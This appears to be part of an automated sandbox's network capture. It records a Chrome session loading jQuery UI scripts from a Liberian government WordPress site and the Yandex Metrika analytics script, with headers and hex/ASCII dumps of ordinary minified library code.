                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC613OUTGET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:48 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Fri, 27 Sep 2024 11:06:30 GMT
                                                                                                                        ETag: "53d8-62317d8e02038"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 21464
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:48 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:48 UTC7823INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 33 2e 33 20 2d 20 32 30 32 34 2d 30 34 2d 32 36 0a 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 65 78 70
                                                                                                                        Data Ascii: /*! jQuery UI - v1.13.3 - 2024-04-26* https://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-exp
                                                                                                                        2025-01-10 13:54:48 UTC8000INData Raw: 68 3a 30 2c 68 65 69 67 68 74 3a 30 2c 6f 66 66 73 65 74 3a 7b 74 6f 70 3a 65 2e 70 61 67 65 59 2c 6c 65 66 74 3a 65 2e 70 61 67 65 58 7d 7d 3a 7b 77 69 64 74 68 3a 74 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 74 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 6f 66 66 73 65 74 3a 74 2e 6f 66 66 73 65 74 28 29 7d 2c 76 5b 30 5d 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 26 26 28 66 2e 61 74 3d 22 6c 65 66 74 20 74 6f 70 22 29 2c 64 3d 65 2e 77 69 64 74 68 2c 70 3d 65 2e 68 65 69 67 68 74 2c 6d 3d 78 2e 65 78 74 65 6e 64 28 7b 7d 2c 67 3d 65 2e 6f 66 66 73 65 74 29 2c 78 2e 65 61 63 68 28 5b 22 6d 79 22 2c 22 61 74 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 2c 69 3d 28 66 5b 74 68 69 73 5d 7c 7c 22 22 29 2e 73 70 6c
                                                                                                                        Data Ascii: h:0,height:0,offset:{top:e.pageY,left:e.pageX}}:{width:t.outerWidth(),height:t.outerHeight(),offset:t.offset()},v[0].preventDefault&&(f.at="left top"),d=e.width,p=e.height,m=x.extend({},g=e.offset),x.each(["my","at"],function(){var t,e,i=(f[this]||"").spl
                                                                                                                        2025-01-10 13:54:48 UTC5641INData Raw: 28 65 7c 7c 74 68 69 73 2e 64 65 66 61 75 6c 74 45 6c 65 6d 65 6e 74 7c 7c 74 68 69 73 29 5b 30 5d 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 3d 78 28 65 29 2c 74 68 69 73 2e 75 75 69 64 3d 63 2b 2b 2c 74 68 69 73 2e 65 76 65 6e 74 4e 61 6d 65 73 70 61 63 65 3d 22 2e 22 2b 74 68 69 73 2e 77 69 64 67 65 74 4e 61 6d 65 2b 74 68 69 73 2e 75 75 69 64 2c 74 68 69 73 2e 62 69 6e 64 69 6e 67 73 3d 78 28 29 2c 74 68 69 73 2e 68 6f 76 65 72 61 62 6c 65 3d 78 28 29 2c 74 68 69 73 2e 66 6f 63 75 73 61 62 6c 65 3d 78 28 29 2c 74 68 69 73 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 3d 7b 7d 2c 65 21 3d 3d 74 68 69 73 26 26 28 78 2e 64 61 74 61 28 65 2c 74 68 69 73 2e 77 69 64 67 65 74 46 75 6c 6c 4e 61 6d 65 2c 74 68 69 73 29 2c 74 68 69 73 2e 5f 6f 6e
                                                                                                                        Data Ascii: (e||this.defaultElement||this)[0],this.element=x(e),this.uuid=c++,this.eventNamespace="."+this.widgetName+this.uuid,this.bindings=x(),this.hoverable=x(),this.focusable=x(),this.classesElementLookup={},e!==this&&(x.data(e,this.widgetFullName,this),this._on


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        33192.168.2.74981469.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC613OUTGET /wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.3 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:48 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Fri, 27 Sep 2024 11:06:30 GMT
                                                                                                                        ETag: "2ee8-62317d8e000f8"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 12008
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:48 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:48 UTC7823INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 54 61 62 73 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75
                                                                                                                        Data Ascii: /*! * jQuery UI Tabs 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(t){"use strict";"function"==typeof define&&define.amd?define(["jqu
                                                                                                                        2025-01-10 13:54:48 UTC4185INData Raw: 68 74 28 4d 61 74 68 2e 6d 61 78 28 30 2c 69 2d 6c 28 74 68 69 73 29 2e 69 6e 6e 65 72 48 65 69 67 68 74 28 29 2b 6c 28 74 68 69 73 29 2e 68 65 69 67 68 74 28 29 29 29 7d 29 2e 63 73 73 28 22 6f 76 65 72 66 6c 6f 77 22 2c 22 61 75 74 6f 22 29 29 3a 22 61 75 74 6f 22 3d 3d 3d 74 26 26 28 69 3d 30 2c 74 68 69 73 2e 70 61 6e 65 6c 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 3d 4d 61 74 68 2e 6d 61 78 28 69 2c 6c 28 74 68 69 73 29 2e 68 65 69 67 68 74 28 22 22 29 2e 68 65 69 67 68 74 28 29 29 7d 29 2e 68 65 69 67 68 74 28 69 29 29 7d 2c 5f 65 76 65 6e 74 48 61 6e 64 6c 65 72 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 69 3d 74 68 69 73 2e 61 63 74 69 76 65 2c 61 3d 6c 28 74 2e 63 75 72 72 65 6e
                                                                                                                        Data Ascii: ht(Math.max(0,i-l(this).innerHeight()+l(this).height()))}).css("overflow","auto")):"auto"===t&&(i=0,this.panels.each(function(){i=Math.max(i,l(this).height("").height())}).height(i))},_eventHandler:function(t){var e=this.options,i=this.active,a=l(t.curren


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        34192.168.2.74981593.158.134.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC524OUTGET /metrika/tag.js HTTP/1.1
                                                                                                                        Host: mc.yandex.ru
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:48 UTC1328INHTTP/1.1 200 OK
                                                                                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Cache-Control: max-age=3600
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 227261
                                                                                                                        Content-Type: application/javascript
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        ETag: "677fcb03-377bd"
                                                                                                                        Expires: Fri, 10 Jan 2025 14:54:48 GMT
                                                                                                                        Last-Modified: Thu, 09 Jan 2025 13:11:31 GMT
                                                                                                                        Set-Cookie: _yasc=ewEUzLtefi8OAJYHy8BBMosKd9MkbHeBNkL4/A15BreZZGTw2NnwfCgogNTgnx7WvrtW; domain=.yandex.ru; path=/; expires=Mon, 08 Jan 2035 13:54:48 GMT; secure
                                                                                                                        Set-Cookie: i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; Expires=Sun, 10-Jan-2027 13:54:48 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                        Set-Cookie: yandexuid=8715430261736517288; Expires=Sun, 10-Jan-2027 13:54:48 GMT; Domain=.yandex.ru; Path=/; Secure; SameSite=None
                                                                                                                        Set-Cookie: yashr=3268409401736517288; Path=/; Domain=.yandex.ru; Expires=Sat, 10 Jan 2026 13:54:48 GMT; SameSite=None; Secure; HttpOnly
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        Timing-Allow-Origin: *
                                                                                                                        2025-01-10 13:54:48 UTC2818INData Raw: ef bb bf 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 4c 61 28 62 61 29 7b 76 61 72 20 74 61 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 61 3c 62 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 62 61 5b 74 61 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 62 61 29 7b 76 61 72 20 74 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 61 29 72 65 74 75 72 6e 20 74 61 2e 63 61 6c 6c 28 62 61 29 3b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 61 2e 6c 65 6e 67 74 68
                                                                                                                        Data Ascii: (function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function u(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length
                                                                                                                        2025-01-10 13:54:48 UTC8168INData Raw: 65 3b 57 61 28 66 29 7d 7d 2c 6f 61 3a 63 7d 7d 66 75 6e 63 74 69 6f 6e 20 54 68 28 61 2c 62 29 7b 72 65 74 75 72 6e 7b 63 6f 6e 74 61 69 6e 65 72 49 64 3a 62 2c 70 65 72 6d 69 73 73 69 6f 6e 54 79 70 65 3a 61 2e 70 65 72 6d 69 73 73 69 6f 6e 54 79 70 65 2c 70 65 72 6d 69 73 73 69 6f 6e 50 61 72 61 6d 73 3a 61 2e 70 65 72 6d 69 73 73 69 6f 6e 50 61 72 61 6d 73 7d 7d 66 75 6e 63 74 69 6f 6e 20 51 6d 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 2e 70 65 72 6d 69 73 73 69 6f 6e 54 79 70 65 2c 64 3d 62 2e 70 65 72 6d 69 73 73 69 6f 6e 73 2c 65 3d 62 2e 70 65 72 6d 69 73 73 69 6f 6e 50 61 72 61 6d 73 3b 69 66 28 22 67 6c 6f 62 61 6c 73 22 3d 3d 3d 63 7c 7c 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3d 3d 3d 63 7c 7c 22 64 61 74 61 4c 61 79 65 72 22 3d 3d 3d 63 29 7b
                                                                                                                        Data Ascii: e;Wa(f)}},oa:c}}function Th(a,b){return{containerId:b,permissionType:a.permissionType,permissionParams:a.permissionParams}}function Qm(a,b){var c=b.permissionType,d=b.permissions,e=b.permissionParams;if("globals"===c||"localStorage"===c||"dataLayer"===c){
                                                                                                                        2025-01-10 13:54:48 UTC6288INData Raw: 74 69 6f 6e 20 54 66 28 61 2c 62 2c 63 2c 64 29 7b 66 6f 72 28 76 61 72 20 65 3d 61 2e 6c 65 6e 67 74 68 2d 31 3b 30 3c 3d 65 3b 2d 2d 65 29 7b 76 61 72 20 66 3d 61 5b 65 5d 3b 66 2e 6f 63 3d 21 31 3b 69 66 28 54 28 66 2e 6d 65 74 68 6f 64 73 2c 62 29 29 7b 66 2e 6d 65 74 68 6f 64 73 5b 62 5d 28 64 3f 64 28 29 3a 76 6f 69 64 20 30 29 3b 72 65 74 75 72 6e 7d 7d 74 68 72 6f 77 20 5a 28 63 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 53 66 28 61 2c 62 2c 63 29 7b 62 3d 76 6f 69 64 20 30 3d 3d 3d 62 3f 7b 7d 3a 62 3b 63 3d 76 6f 69 64 20 30 3d 3d 3d 63 3f 7b 7d 3a 63 3b 76 61 72 20 64 3d 61 2e 63 6f 6e 63 61 74 3b 62 3d 76 6f 69 64 20 30 3d 3d 3d 62 3f 7b 7d 3a 62 3b 63 3d 76 6f 69 64 20 30 3d 3d 3d 63 3f 7b 7d 3a 63 3b 72 65 74 75 72 6e 20 64 2e 63 61 6c 6c 28 61 2c
                                                                                                                        Data Ascii: tion Tf(a,b,c,d){for(var e=a.length-1;0<=e;--e){var f=a[e];f.oc=!1;if(T(f.methods,b)){f.methods[b](d?d():void 0);return}}throw Z(c);}function Sf(a,b,c){b=void 0===b?{}:b;c=void 0===c?{}:c;var d=a.concat;b=void 0===b?{}:b;c=void 0===c?{}:c;return d.call(a,
                                                                                                                        2025-01-10 13:54:48 UTC8168INData Raw: 3d 70 61 28 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 2c 6c 29 7b 72 65 74 75 72 6e 20 58 66 28 68 2c 6c 29 3d 3d 3d 6b 7d 2c 45 28 64 61 28 22 62 69 64 64 65 72 43 6f 64 65 22 29 2c 62 2e 62 69 64 64 65 72 52 65 71 75 65 73 74 73 29 29 29 3a 64 7c 7c 67 28 62 29 3b 63 2e 57 65 26 26 28 63 2e 62 61 3d 21 30 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 63 2e 62 69 64 2c 65 3d 64 2e 62 69 64 64 65 72 43 6f 64 65 7c 7c 64 2e 62 69 64 64 65 72 3b 64 3d 64 2e 61 64 55 6e 69 74 43 6f 64 65 3b 65 26 26 64 26 26 28 62 3d 71 69 28 62 2c 64 29 2c 62 2e 50 62 7c 7c 28 62 2e 50 62 3d 7b 7d 29 2c 61 3d 22 61 64 52 65 6e 64 65 72 53 75 63 63 65 65 64 65 64 22 3d 3d 3d 61 2c 64 3d 7b 7d 2c 62 2e 50 62 5b 65 5d 3d 28 64 2e 73 75 63 63
                                                                                                                        Data Ascii: =pa(function(h,k,l){return Xf(h,l)===k},E(da("bidderCode"),b.bidderRequests))):d||g(b);c.We&&(c.ba=!0)}}}function Hn(a,b,c){var d=c.bid,e=d.bidderCode||d.bidder;d=d.adUnitCode;e&&d&&(b=qi(b,d),b.Pb||(b.Pb={}),a="adRenderSucceeded"===a,d={},b.Pb[e]=(d.succ
                                                                                                                        2025-01-10 13:54:48 UTC8168INData Raw: 3d 76 61 28 61 2c 22 63 22 29 3b 6d 3d 45 28 66 75 6e 63 74 69 6f 6e 28 72 2c 71 29 7b 72 65 74 75 72 6e 20 70 28 7b 4e 3a 7b 65 61 3a 67 2c 4f 61 3a 33 45 33 7d 7d 2c 5b 22 68 74 74 70 73 3a 2f 2f 22 2b 72 5d 29 5b 22 63 61 74 63 68 22 5d 28 79 28 78 28 22 62 22 2c 68 29 2c 78 28 22 22 2b 71 2c 68 29 29 29 7d 2c 70 61 28 4e 2c 6d 29 29 3b 72 65 74 75 72 6e 20 4c 2e 61 6c 6c 28 6d 29 7d 6b 28 29 7d 2c 6b 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6d 3d 64 2e 43 28 22 73 63 69 70 22 29 3b 21 6d 7c 7c 68 62 28 6d 2c 22 61 22 29 7c 7c 68 62 28 6d 2c 22 62 22 29 7c 7c 28 65 2e 44 28 22 73 63 69 22 2c 66 29 2c 68 28 22 32 22 29 29 7d 2c 0a 42 29 7d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 4c 69 28 61 29 7b 72 65 74 75 72 6e 7b 52 3a 66 75 6e
                                                                                                                        Data Ascii: =va(a,"c");m=E(function(r,q){return p({N:{ea:g,Oa:3E3}},["https://"+r])["catch"](y(x("b",h),x(""+q,h)))},pa(N,m));return L.all(m)}k()},k).then(function(){var m=d.C("scip");!m||hb(m,"a")||hb(m,"b")||(e.D("sci",f),h("2"))},B)}}}}function Li(a){return{R:fun
                                                                                                                        2025-01-10 13:54:48 UTC8168INData Raw: 28 29 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 71 29 7b 69 66 28 6f 67 28 71 29 29 7b 64 2e 67 61 28 5b 22 5c 75 30 34 33 64 22 5d 2c 72 29 3b 72 61 28 61 2c 6d 29 3b 76 61 72 20 74 3d 51 62 28 61 2c 71 2e 6f 72 69 67 69 6e 29 2e 68 6f 73 74 3b 6c 7c 7c 71 2e 73 6f 75 72 63 65 21 3d 3d 61 2e 70 61 72 65 6e 74 7c 7c 21 71 2e 64 61 74 61 2e 66 72 61 6d 65 49 64 7c 7c 22 61 62 6f 75 74 3a 62 6c 61 6e 6b 22 21 3d 3d 56 28 61 29 2e 68 6f 73 74 26 26 21 48 28 74 2c 63 29 7c 7c 28 6c 3d 21 30 2c 64 2e 24 28 22 69 22 2c 7b 66 72 61 6d 65 49 64 3a 71 2e 64 61 74 61 2e 66 72 61 6d 65 49 64 2c 69 61 3a 21 30 7d 29 29 7d 7d 3b 64 2e 46 28 5b 22 5c 75 30 34 33 64 22 5d 2c 72 29 3b 58 28 61 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 2e 67 61 28 5b 22 5c 75 30 34 33
                                                                                                                        Data Ascii: ();var r=function(q){if(og(q)){d.ga(["\u043d"],r);ra(a,m);var t=Qb(a,q.origin).host;l||q.source!==a.parent||!q.data.frameId||"about:blank"!==V(a).host&&!H(t,c)||(l=!0,d.$("i",{frameId:q.data.frameId,ia:!0}))}};d.F(["\u043d"],r);X(a,function(){d.ga(["\u043
                                                                                                                        2025-01-10 13:54:48 UTC8168INData Raw: 74 75 72 6e 20 64 7d 66 75 6e 63 74 69 6f 6e 20 76 67 28 61 29 7b 69 66 28 50 64 29 7b 50 64 3d 21 31 3b 76 61 72 20 62 3d 61 2e 6c 3b 61 3d 4b 62 28 61 2e 6c 29 3b 76 61 72 20 63 3d 5b 5d 3b 6f 62 28 62 2c 63 2c 31 35 29 3f 62 3d 5b 5d 3a 28 57 28 63 2c 61 29 2c 62 3d 63 29 3b 72 65 74 75 72 6e 20 62 7d 7d 66 75 6e 63 74 69 6f 6e 20 62 6a 28 61 29 7b 69 66 28 21 50 64 29 7b 50 64 3d 21 30 3b 61 3d 4b 62 28 61 2e 6c 29 3b 76 61 72 20 62 3d 5b 5d 3b 68 63 28 62 2c 31 34 29 3b 57 28 62 2c 61 29 3b 72 65 74 75 72 6e 20 62 7d 7d 66 75 6e 63 74 69 6f 6e 20 69 70 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 62 5b 66 62 5d 3b 0a 69 66 28 64 29 7b 61 3a 7b 76 61 72 20 65 3d 4b 62 28 61 29 2c 66 3d 62 5b 66 62 5d 3b 69 66 28 30 3c 66 29 7b 76 61 72 20 67 3d 5b 5d 3b
                                                                                                                        Data Ascii: turn d}function vg(a){if(Pd){Pd=!1;var b=a.l;a=Kb(a.l);var c=[];ob(b,c,15)?b=[]:(W(c,a),b=c);return b}}function bj(a){if(!Pd){Pd=!0;a=Kb(a.l);var b=[];hc(b,14);W(b,a);return b}}function ip(a,b,c){var d=b[fb];if(d){a:{var e=Kb(a),f=b[fb];if(0<f){var g=[];
                                                                                                                        2025-01-10 13:54:48 UTC8168INData Raw: 20 57 63 28 61 2c 62 29 3b 69 66 28 58 63 2e 69 73 45 6e 61 62 6c 65 64 28 61 29 29 72 65 74 75 72 6e 20 6e 65 77 20 58 63 28 61 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 63 28 61 2c 62 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 74 68 69 73 2e 69 73 53 79 6e 63 3d 21 31 3b 74 68 69 73 2e 45 62 3d 5b 5d 3b 76 61 72 20 64 3d 7b 7d 3b 74 68 69 73 2e 69 68 3d 28 64 2e 61 64 3d 22 6d 75 74 61 74 69 6f 6e 41 64 64 22 2c 64 2e 72 65 3d 22 6d 75 74 61 74 69 6f 6e 52 65 6d 6f 76 65 22 2c 0a 64 2e 74 63 3d 22 6d 75 74 61 74 69 6f 6e 54 65 78 74 43 68 61 6e 67 65 22 2c 64 2e 61 63 3d 22 6d 75 74 61 74 69 6f 6e 41 74 74 72 69 62 75 74 65 73 43 68 61 6e 67 65 22 2c 64 2e 70 61 67 65 3d 22 70 61 67 65 44 61 74 61 22 2c 64 29 3b 64 3d 7b 7d 3b 74 68 69 73 2e 62 68 3d 28 64
                                                                                                                        Data Ascii: Wc(a,b);if(Xc.isEnabled(a))return new Xc(a,c)}function Wc(a,b){var c=this;this.isSync=!1;this.Eb=[];var d={};this.ih=(d.ad="mutationAdd",d.re="mutationRemove",d.tc="mutationTextChange",d.ac="mutationAttributesChange",d.page="pageData",d);d={};this.bh=(d
                                                                                                                        2025-01-10 13:54:48 UTC8168INData Raw: 6c 3d 6e 28 62 2c 22 73 65 74 74 69 6e 67 73 2e 73 62 70 22 29 3b 63 2e 77 62 3d 65 3b 69 66 28 6c 29 7b 76 61 72 20 6d 3d 7b 7d 3b 63 2e 64 61 74 61 3d 41 28 7b 7d 2c 6c 2c 28 6d 2e 63 3d 64 2e 69 64 2c 6d 29 29 7d 72 65 74 75 72 6e 20 68 2e 6c 65 6e 67 74 68 3f 0a 6b 71 28 61 2c 66 2c 67 2c 62 2c 6b 2c 63 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 71 28 61 2c 68 2c 67 2c 66 2c 6b 2c 63 29 7d 2c 42 29 3a 28 65 28 32 29 2c 4c 2e 72 65 73 6f 6c 76 65 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 68 71 28 61 29 7b 76 61 72 20 62 3d 61 66 28 61 29 3b 61 3d 79 28 42 6a 2c 4a 63 28 5b 22 69 50 68 6f 6e 65 22 2c 22 69 50 61 64 22 5d 29 29 28 61 29 3b 72 65 74 75 72 6e 20 62 3f 6d 71 3a 61 3f 6e 71 3a 5b 5d 7d 66 75 6e 63 74 69 6f 6e
                                                                                                                        Data Ascii: l=n(b,"settings.sbp");c.wb=e;if(l){var m={};c.data=A({},l,(m.c=d.id,m))}return h.length?kq(a,f,g,b,k,c).then(function(){return lq(a,h,g,f,k,c)},B):(e(2),L.resolve())}function hq(a){var b=af(a);a=y(Bj,Jc(["iPhone","iPad"]))(a);return b?mq:a?nq:[]}function
